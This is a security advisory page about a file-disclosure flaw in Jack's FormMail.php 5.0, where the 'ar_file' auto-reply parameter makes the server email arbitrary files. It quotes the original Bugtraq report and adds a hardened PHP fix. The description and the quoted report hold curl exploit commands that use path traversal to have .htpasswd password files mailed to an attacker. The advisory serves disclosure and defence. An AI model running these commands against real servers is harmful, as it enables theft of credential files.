SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
Category:  Application (Generic)  >  Jack's FormMail.php
Vendors:  Ai Graphics and Joe Lumbroso
Jack's FormMail.php 'ar_file' Parameter Lets Remote Users Obtain Files from the System
SecurityTracker Alert ID:  1012747
SecurityTracker URL:  http://securitytracker.com/id?1012747
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jan 1 2005
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 5.0; possibly other versions
Description:  A vulnerability was reported in Jack's FormMail.php. A remote user can view files on the target system.

Hack Hawk reported that a remote user can specify a value for the 'ar_file' auto-reply parameter to cause the target server to send an arbitrary file to the remote user.

A demonstration exploit is provided:

# curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd -d email=you@yoursite.com http://yoursite.com/cgi-bin/formmail.php

Impact:  A remote user can obtain files on the target system that are readable by the target web service.
Solution:  No solution was available at the time of this entry.

The report indicates that, as a workaround, you can remove the following code from the FormMail.php script:

------------------------------------------------------
if (file_exists($ar_file)) {
    $fd = fopen($ar_file, "rb");
    $ar_message = fread($fd, filesize($ar_file));
    fclose($fd);
    mail_it($ar_message, ($ar_subject)?stripslashes($ar_subject):"RE: Form Submission", ($ar_from)?$ar_from:$recipient, $email);
}
------------------------------------------------------
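The block above reads whatever path the form submitter puts in 'ar_file', which is the whole vulnerability. If the auto-reply feature is needed rather than removed, the following is one way to keep it safely. This is an added example, not code from FormMail.php, the advisory or the vendor; it assumes a fixed auto-reply directory (AR_DIR) outside the web root and reuses the script's own mail_it(), $ar_subject, $ar_from, $recipient and $email.

```php
<?php
// Added example (not part of FormMail.php or the advisory): a hardened
// replacement for the quoted auto-reply block. The submitter may only
// select an auto-reply by a plain file name inside AR_DIR; the resolved
// path is then checked to still lie inside AR_DIR.

// Assumed: a directory holding only the site's own auto-reply texts.
define('AR_DIR', '/var/www/formmail/autoreplies');

function resolve_autoreply(string $requested): ?string
{
    // Accept only a simple file name: no slashes, no "..", no NUL bytes.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.txt$/', $requested)) {
        return null;
    }
    $base = realpath(AR_DIR);
    $path = realpath(AR_DIR . '/' . $requested);
    // realpath() returns false for a missing file; the prefix test also
    // rejects symlinks inside AR_DIR that point outside it.
    if ($base === false || $path === false || !is_file($path)
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Hardened counterpart of the quoted block. $ar_file still comes from the
// form (read explicitly here rather than via register_globals), but it can
// now only name a file that lives in AR_DIR.
$ar_file = $_POST['ar_file'] ?? '';
$ar_path = resolve_autoreply($ar_file);
if ($ar_path !== null) {
    $ar_message = file_get_contents($ar_path);
    mail_it($ar_message,
            $ar_subject ? stripslashes($ar_subject) : "RE: Form Submission",
            $ar_from ? $ar_from : $recipient,
            $email);
}
```

A request such as ar_file=../members/.htpasswd fails the file-name pattern and is never opened, so the script sends nothing it was not meant to send.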

Vendor URL:  dtheatre.com/scripts/formmail.php
Cause:  Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Hack Hawk <hh@hackhawk.net>
Message History:   None.


 Source Message Contents

Date:  31 Dec 2004 15:06:38 -0800
From:  Hack Hawk <hh@hackhawk.net>
Subject:  Jack's FormMail.php remote file access vulnerability

 

Security Advisory

Vendor:       Jack (Jack's Scripts)
Date:         31-Dec-2004
Script:       FormMail.php
Site:         http://dtheatre.com/scripts/formmail.php
Type:         Remote
Severity:     High
Version:      5.0 (maybe others)

Script Overview:

Jack's FormMail.php script is a simple PHP script that
allows web site owners to easily email form values to
themselves without much work or scripting knowledge.

Problem:

The script currently accepts an auto-reply variable
(ar_file) that specifies a filepath to send to the
person submitting the form.  The problem is that
this variable can be defined by the person submitting
the form and can be used to have arbitrary server
files sent to that person.

I found this vulnerability because someone used the
attack against a customer of mine.  Because this is
being used in the wild, I'm posting immediately to
BUGTRAQ without waiting for Jack to fix the script.

Solution:

Remove the following code from the FormMail.php
script.
------------------------------------------------------
if (file_exists($ar_file)) {
    $fd = fopen($ar_file, "rb");
    $ar_message = fread($fd, filesize($ar_file));
    fclose($fd);
    mail_it($ar_message, ($ar_subject)?stripslashes($ar_subject):"RE: Form Submission", ($ar_from)?$ar_from:$recipient, $email);
}
------------------------------------------------------

Example Attack:

Assume the following:
Script Location : http://yoursite.com/cgi-bin/formmail.php
Password File Location : http://yoursite.com/members/.htpasswd

Use the following curl command to have the password file emailed to you.

# curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd -d email=you@yoursite.com http://yoursite.com/cgi-bin/formmail.php

Depending on permission settings, the .htpasswd could be
compromised, even if it is outside of the html folder as
in the following example.

# curl -e http://yoursite.com/ -d ar_file=../../.htpasswd -d email=you@yoursite.com http://yoursite.com/cgi-bin/formmail.php

Copyright 2004, SecurityGlobal.net LLC